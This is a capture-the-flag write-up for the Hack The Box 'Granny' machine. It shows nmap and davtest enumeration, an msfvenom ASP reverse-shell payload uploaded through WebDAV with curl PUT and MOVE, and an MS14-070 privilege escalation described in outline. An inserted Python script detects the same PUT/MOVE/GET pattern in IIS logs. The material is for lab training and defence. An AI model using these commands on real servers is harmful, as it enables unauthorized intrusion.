Let’s get started!
COMMAND: nmap -sC -sV -oN granny 10.10.10.15
Let’s open the URL in a browser and check!
After visiting the URL we can see that the site is still under construction. Sites in that state often expose misconfigurations, which we can take advantage of for further exploitation.
Checking the website directories with the dirb tool shows that there are some server misconfigurations. More importantly, the port scan revealed that HTTP WebDAV methods are enabled. A good way to test for this is with:
COMMAND: davtest --url http://10.10.10.15
After looking around online I found a good source on using curl for WebDAV method requests:
Webdav curl examples link
Firstly, a shell needs to be generated to upload to the web server. Since enumeration showed that the server runs ASP, an ASP reverse shell can be generated with msfvenom (written to a .txt file here, because that is the extension it is uploaded with in the next step):
msfvenom -p windows/shell_reverse_tcp LHOST=IP_ADDRESS LPORT=PORT -f asp > exp1o1t9r.txt
curl is used to upload the reverse shell as a .txt file. Then the MOVE method is used to change the file extension to
root@exp1o1t9r:~/htb/machines/granny# curl -T 'exp1o1t9r.txt' http://10.10.10.15/exp1o1t9r.txt
root@exp1o1t9r:~/htb/machines/granny# curl -X MOVE --header 'Destination:http://10.10.10.15/exp1o1t9r.asp' 'http://10.10.10.15/exp1o1t9r.txt'
root@exp1o1t9r:~/htb/machines/granny# curl 'http://10.10.10.15/exp1o1t9r.asp'
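From the defender's side, the sequence above (an anonymous PUT of a harmless-looking .txt, a MOVE of the same resource a few seconds later, then a GET of a freshly created .asp) is exactly what stands out in IIS W3C logs. The following script is an added example, not part of the original writeup or of any tool it mentions: it parses IIS-style W3C log lines and raises an alert for successful anonymous write-type WebDAV methods, for a PUT followed by a MOVE of the same path from the same client, and for a server-side script requested shortly after that client's PUT. The log lines, client addresses (10.10.14.x), file names and timestamps are constructed for the example; IIS 6 does not log the MOVE Destination header, so the correlation is done on the source path and client address instead.

```python
from datetime import datetime, timedelta

# IIS W3C log lines, constructed for this example (not real server logs).
# The #Fields header defines the column layout, as in a real IIS log file.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2017-04-12 10:02:11 10.10.10.15 GET / - 80 - 10.10.14.5 Mozilla/5.0 200 0 0
2017-04-12 10:02:40 10.10.10.15 PROPFIND / - 80 - 10.10.14.5 Microsoft-WebDAV-MiniRedir/6.1 207 0 0
2017-04-12 10:03:02 10.10.10.15 PUT /upload.txt - 80 - 10.10.14.5 curl/7.52.1 201 0 0
2017-04-12 10:03:09 10.10.10.15 MOVE /upload.txt - 80 - 10.10.14.5 curl/7.52.1 201 0 0
2017-04-12 10:03:15 10.10.10.15 GET /upload.asp - 80 - 10.10.14.5 curl/7.52.1 200 0 0
2017-04-12 10:05:00 10.10.10.15 PUT /notes.txt - 80 - 10.10.14.9 curl/7.52.1 403 0 0
"""

# WebDAV/HTTP methods that modify server content; PROPFIND is read-only and common for legitimate clients.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}
# Extensions IIS will execute server-side (assumed list for this example).
EXEC_EXT = (".asp", ".aspx", ".ashx", ".asmx")
WINDOW = timedelta(minutes=5)


def parse_w3c(text):
    """Yield one dict per log row, naming columns from the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # skip a malformed row rather than mis-assign columns
        yield dict(zip(fields, values))


def find_webdav_alerts(text):
    """Return a list of (client_ip, reason) tuples for suspicious WebDAV activity."""
    alerts = []
    last_put = {}  # client ip -> (timestamp, uri) of its most recent successful PUT
    for row in parse_w3c(text):
        method = row["cs-method"]
        status = int(row["sc-status"])
        client = row["c-ip"]
        uri = row["cs-uri-stem"]
        ts = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
        ok = 200 <= status < 300

        # 1. A write-type method that succeeded without any authenticated user.
        if method in WRITE_METHODS and ok and row["cs-username"] == "-":
            alerts.append((client, f"anonymous {method} {uri} -> {status}"))

        # 2. PUT followed by MOVE of the same resource from the same client (rename to a new extension).
        if method == "PUT" and ok:
            last_put[client] = (ts, uri)
        elif method == "MOVE" and ok and client in last_put:
            put_ts, put_uri = last_put[client]
            if put_uri == uri and ts - put_ts <= WINDOW:
                alerts.append((client, f"PUT then MOVE of {uri} within {ts - put_ts}"))

        # 3. A server-side script fetched shortly after that client uploaded something.
        if method == "GET" and ok and uri.lower().endswith(EXEC_EXT) and client in last_put:
            put_ts, _ = last_put[client]
            if ts - put_ts <= WINDOW:
                alerts.append((client, f"script {uri} requested {ts - put_ts} after PUT"))
    return alerts


if __name__ == "__main__":
    for ip, reason in find_webdav_alerts(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

The 403 on the second client's PUT produces no alert, which is the point: on a server where anonymous WebDAV writes are refused, the first rule never fires, so any hit on it is worth an incident ticket on its own, and the PUT/MOVE/GET chain is the corroborating evidence.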
After sending the payload to the server we need to set up a listener in order to catch the reverse shell!
BOOM! We got a shell. Let’s pwn the user flag!!
ACCESS DENIED!! :(
whoami /all reveals that I do not have a privileged shell; further post-exploitation enumeration is needed to get one.
sysinfo shows that the machine is running an old version of Windows: Windows Server 2003 SP2.
After some research, several local exploits were found at:
The MS14-070 exploit appeared to be what I was looking for. The exploit was put onto the target machine the same way as the reverse shell. When it was executed, the exploit did not work properly: the process was running but stuck.
To solve this, Metasploit is used to upgrade the shell to a Meterpreter session and migrate to another process.
Then run the exploit again to escalate privileges!!
If you like my writeup, give me Respect on my HTB profile: Exp1o1t9r